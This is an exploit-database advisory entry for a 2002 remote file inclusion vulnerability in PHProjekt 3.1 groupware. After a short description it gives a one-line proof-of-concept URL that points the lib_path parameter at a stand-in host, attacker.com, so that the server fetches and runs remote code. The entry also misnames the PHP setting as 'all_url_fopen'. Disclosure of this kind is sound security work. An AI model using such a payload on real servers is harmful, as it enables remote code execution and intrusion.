PHProjekt 3.1 - Remote File Inclusion

2002-03-13T00:00:00
ID EXPLOITPACK:28AD84E879DA1B8FC213BC0F976AD84E
Type exploitpack
Reporter b0iler
Modified 2002-03-13T00:00:00

Description

PHProjekt 3.1 - Remote File Inclusion

                                        
                                            source: https://www.securityfocus.com/bid/4284/info

PHProjekt is a freely available, open source PHP Groupware package. It is actively maintained by the PHProjekt Development Team. It will run on most Linux and Unix variants, in addition to Microsoft Windows operating systems.

PHProjekt is prone to an issue which may allow an attacker to include arbitrary files located on a remote server. If the included file is a PHP script, this may allow for execution of arbitrary attacker-supplied code.

Successful exploitation depends partly on the configuration of PHP on the host running the vulnerable software. If 'all_url_fopen' is set to 'off' then exploitation of this issue may be limited. 

http://site.com/filemanager/filemanager_forms.php?lib_path=http://attacker.com/nasty/scripts